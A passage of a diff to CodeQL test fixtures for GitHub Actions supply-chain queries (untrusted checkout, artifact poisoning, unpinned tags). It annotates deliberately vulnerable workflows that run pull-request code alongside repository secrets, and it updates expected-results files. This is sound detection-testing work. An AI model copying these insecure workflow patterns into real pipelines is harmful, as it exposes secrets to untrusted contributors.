contains(github.event.comment.body, '/rollback') uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 - - name: Checkout PR branch + - name: Checkout PR branch # $ Alert[actions/unversioned-immutable-action] if: contains(github.event.comment.body, '/deploy') uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Get environment from comment + - name: Get environment from comment # $ Alert[actions/unversioned-immutable-action] id: environment shell: bash env: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml index 0be96a4140ef..ef42bbb4a3c5 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test15.yml @@ -62,7 +62,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Install GH CLI + - name: Install GH CLI # $ Alert[actions/unversioned-immutable-action] uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 - name: Check comment keywords @@ -112,7 +112,7 @@ jobs: with: ref: ${{ steps.comment-branch.outputs.head_ref }} - - name: Log into Azure + - name: Log into Azure # $ Alert[actions/unversioned-immutable-action] uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 with: creds: ${{ secrets.AZURE_CREDENTIALS }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml index f679b772e340..d5de91480cb1 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test17.yml @@ -16,8 +16,8 @@ jobs: ref: ${{ github.event.workflow_run.head_branch }} fetch-depth: 0 - - name: SonarCloud Scan - uses: sonarsource/sonarcloud-github-action@master + - name: SonarCloud Scan # $ Alert[actions/untrusted-checkout/critical] + uses: sonarsource/sonarcloud-github-action@master # $ Alert[actions/unpinned-tag] env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml index 6347db51e3c9..96de593004ab 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test18.yml @@ -30,12 +30,12 @@ jobs: let fs = require('fs'); fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/rsc-pr-build-artifacts.zip`, Buffer.from(download.data)); - - name: Unzip artifacts + - name: Unzip artifacts # $ Alert[actions/artifact-poisoning/critical] run: unzip rsc-pr-build-artifacts.zip - name: SonarCloud Scan - uses: sonarsource/sonarcloud-github-action@master + uses: sonarsource/sonarcloud-github-action@master # $ Alert[actions/unpinned-tag] env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} # $ Sink[actions/artifact-poisoning/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml index 2f3b0bb876f6..4cf7a49245c2 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test22.yml @@ -59,4 +59,4 @@ jobs: with: ref: ${{ needs.bump-version.outputs.release_branch || github.ref }} - - run: ./bin/build-plugin-zip.sh + - run: ./bin/build-plugin-zip.sh # $ Alert[actions/unversioned-immutable-action] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml index c825cc73813b..1404c559b0a8 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml @@ -29,7 +29,7 @@ jobs: run-id: ${{ github.event.workflow_run.id }} # Don't fail a build if the file doesn't exist continue-on-error: true - - name: Extract previously uploaded build scan content + - name: Extract previously uploaded build scan content # $ Alert[actions/artifact-poisoning/critical] if: ${{ steps.downloadBuildScan.outcome != 'failure'}} run: tar -xzf build-scan.tgz -C ~ - name: Publish @@ -37,6 +37,6 @@ jobs: # Don't fail a build if publishing fails continue-on-error: true run: | - ./gradlew buildScanPublishPrevious + ./gradlew buildScanPublishPrevious # $ Sink[actions/artifact-poisoning/critical] env: ACCESS_KEY: ${{ secrets.TEST_ACCESS_KEY }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml index b1d776ef6c8a..9b7a6c535c61 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml @@ -18,5 +18,5 @@ jobs: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 with: ref: ${{ inputs.git_ref }} - - run: | - ./cmd + - run: | # $ Alert[actions/untrusted-checkout/critical] Alert[actions/unversioned-immutable-action] + ./cmd # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml index 5f67fecc09a5..16d84cd70f73 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml @@ -17,4 +17,4 @@ jobs: - uses: actions/checkout@eef61447b9ff4aafe5dcd4e0bbf5d482be7e7871 # v4.2.1 with: ref: ${{ github.head_ref }} - - run: make foo + - run: make foo # $ Alert[actions/unversioned-immutable-action] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml index cc7f71a7b3e4..afbb3f0a433a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml @@ -11,11 +11,11 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} fetch-depth: 0 - - uses: actions/github-script@v5 + - uses: actions/github-script@v5 # $ Alert[actions/untrusted-checkout/critical] with: github-token: ${{secrets.GITHUB_TOKEN}} script: | const { foo } = require('./foo'); - + # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml index d9aa2973e007..8c45b9f89303 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml @@ -30,7 +30,7 @@ jobs: with: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - run: npm install + - run: npm install # $ Alert[actions/untrusted-checkout/medium] working-directory: scripts/github-actions/semantic-pull-request/ - name: Lint PR Title if: github.event_name == 'pull_request_target' diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml index f82f493cd6e0..5d143bb3f859 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml @@ -22,7 +22,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Checkout + - name: Checkout # $ Alert[actions/untrusted-checkout/medium] if: ${{ github.event_name != 'pull_request_target' }} uses: actions/checkout@v3 with: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml index 7a346a897e45..99b3c1d49008 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml @@ -21,8 +21,8 @@ jobs: persist-credentials: false ref: refs/pull/${{ github.event.issue.number }}/head - - name: Setup PNPM - uses: pnpm/action-setup@v3 + - name: Setup PNPM # $ Alert[actions/untrusted-checkout/critical] + uses: pnpm/action-setup@v3 # $ Alert[actions/unpinned-tag] - name: Setup Node uses: actions/setup-node@v4 @@ -33,10 +33,10 @@ jobs: - name: Install dependencies run: pnpm install - - name: Build Packages + - name: Build Packages # $ Sink[actions/untrusted-checkout/critical] run: pnpm run build - - name: Get bench command + - name: Get bench command # $ Sink[actions/untrusted-checkout/critical] id: bench-command env: # protects from untrusted user input and command injection @@ -56,5 +56,5 @@ jobs: echo "$processed" >> $GITHUB_OUTPUT echo "BENCHEOF" >> $GITHUB_OUTPUT shell: bash - - run: python2.7 foo.py - - run: pip install --no-deps . + - run: python2.7 foo.py # $ Sink[actions/untrusted-checkout/critical] + - run: pip install --no-deps . # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml index 381cc16a6d16..bb28d082ac57 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml @@ -23,7 +23,7 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} repository: ${{ github.event.pull_request.head.repo.full_name }} fetch-depth: 0 - - name: Generate openapi.json + - name: Generate openapi.json # $ Alert[actions/untrusted-checkout/medium] Alert[actions/unversioned-immutable-action] run: dotnet test tests/Jellyfin.Server.Integration.Tests/Jellyfin.Server.Integration.Tests.csproj -c Release --filter "Jellyfin.Server.Integration.Tests.OpenApiSpecTests" publish-unstable: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml index 6f7ff665be3b..2c8007b99846 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml @@ -13,6 +13,6 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} repository: ${{ github.event.pull_request.head.repo.full_name }} fetch-depth: 0 - - run: + - run: # $ Alert[actions/untrusted-checkout/medium] Alert[actions/unversioned-immutable-action] sed -f script/config foo.md > bar.md diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml index 6e7612144bcc..eef43d011d4c 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml @@ -7,13 +7,13 @@ jobs: runs-on: ubuntu-latest steps: - uses: foo/bar - - uses: foo/bar@v1 + - uses: foo/bar@v1 # $ Alert[actions/unpinned-tag] - uses: foo/bar@25b062c917b0c75f8b47d8469aff6c94ffd89abb - - uses: docker://foo/bar@latest + - uses: docker://foo/bar@latest # $ Alert[actions/unpinned-tag] - uses: docker://foo/bar@sha256:887a259a5a534f3c4f36cb02dca341673c6089431057242cdc931e9f133147e9 # SHA-256 pinned (64 hex chars) - should NOT be flagged - uses: foo/bar@25b062c917b0c75f8b47d8469aff6c94ffd89abb25b062c917b0c75f8b47d84d # SHA-1 pinned (40 hex chars) regression - should NOT be flagged - uses: foo/bar@a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2 # Invalid 50-char hex string - should be flagged - - uses: foo/bar@a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2a1b2c3d4e5 + - uses: foo/bar@a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2a1b2c3d4e5 # $ Alert[actions/unpinned-tag] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml index 15d4813c40e9..5119b7384ea2 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml @@ -8,14 +8,14 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ github.event.pull_request.head.sha }} - - name: Setup Node.js + - name: Setup Node.js # $ Alert[actions/untrusted-checkout/critical] uses: actions/setup-node@v4 with: node-version: 21 - run: | npm install npm run lint - test2: + test2: # $ Sink[actions/untrusted-checkout/critical] runs-on: ubuntu-latest env: HEAD: ${{ github.event.pull_request.head.sha }} @@ -23,10 +23,10 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ env.HEAD }} - - name: Setup Node.js + - name: Setup Node.js # $ Alert[actions/untrusted-checkout/critical] uses: actions/setup-node@v4 with: node-version: 21 - run: | npm install - npm run lint + npm run lint # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml index 47a0dfc6bd34..644738a76059 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml @@ -16,4 +16,4 @@ jobs: env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} run: | - gh pr checkout ${{ needs.should_run_it.outputs.pr_number }} + gh pr checkout ${{ needs.should_run_it.outputs.pr_number }} # $ Alert[actions/untrusted-checkout/high] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml index 0a38be8b12be..1001c8549785 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml @@ -10,4 +10,4 @@ jobs: steps: - uses: actions/checkout@v4 - uses: ./.github/actions/dangerous-git-checkout - - run: yarn test + - run: yarn test # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml index 7e154502c139..f06228207876 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml @@ -32,20 +32,20 @@ jobs: repository: ${{ fromJSON(steps.get-pr.outputs.result).head.repo.full_name }} ref: ${{ fromJSON(steps.get-pr.outputs.result).head.ref }} - - name: Update version minor + - name: Update version minor # $ Alert[actions/untrusted-checkout/critical] if: contains(github.event.comment.body, '/version minor') run: | ./version.sh -u -n echo "BUMP_TYPE=minor" >> $GITHUB_ENV - - name: Update version major + - name: Update version major # $ Sink[actions/untrusted-checkout/critical] if: contains(github.event.comment.body, '/version major') run: | ./version.sh -u -m echo "BUMP_TYPE=major" >> $GITHUB_ENV - - name: Update version patch + - name: Update version patch # $ Sink[actions/untrusted-checkout/critical] if: contains(github.event.comment.body, '/version patch') run: | ./version.sh -u -p - echo "BUMP_TYPE=patch" >> $GITHUB_ENV + echo "BUMP_TYPE=patch" >> $GITHUB_ENV # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml index c802355d102a..145cb77b8298 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml @@ -13,7 +13,7 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ github.event.workflow_run.head.sha }} - - uses: actions/checkout@v2 + - uses: actions/checkout@v2 # $ Alert[actions/untrusted-checkout/high] with: - ref: ${{ env.HEAD }} + ref: ${{ env.HEAD }} # $ Alert[actions/untrusted-checkout/high] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml index bcde60f55cb8..3cbd9d698dd7 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml @@ -13,7 +13,7 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ github.event.workflow_run.head.sha }} - - uses: actions/checkout@v2 + - uses: actions/checkout@v2 # $ Alert[actions/untrusted-checkout/high] with: - ref: ${{ env.HEAD }} + ref: ${{ env.HEAD }} # $ Alert[actions/untrusted-checkout/high] diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 3c5f6bf93e98..df0776a8b0f1 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -1,3 +1,22 @@ +#select +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning21.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning22.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning31.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning32.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning33.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning34.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning41.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning42.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning71.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning81.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/artifactpoisoning96.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning96.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning96.yml:18:14:18:24 | npm install | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning96.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning101.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/test18.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/test25.yml:2:3:2:14 | workflow_run | workflow_run | edges | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | Config | | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | Config | @@ -54,22 +73,3 @@ nodes | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | semmle.label | Uses Step: downloadBuildScan | | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | subpaths -#select -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning11.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning12.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning21.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning22.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning31.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning32.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning33.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning34.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning41.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | 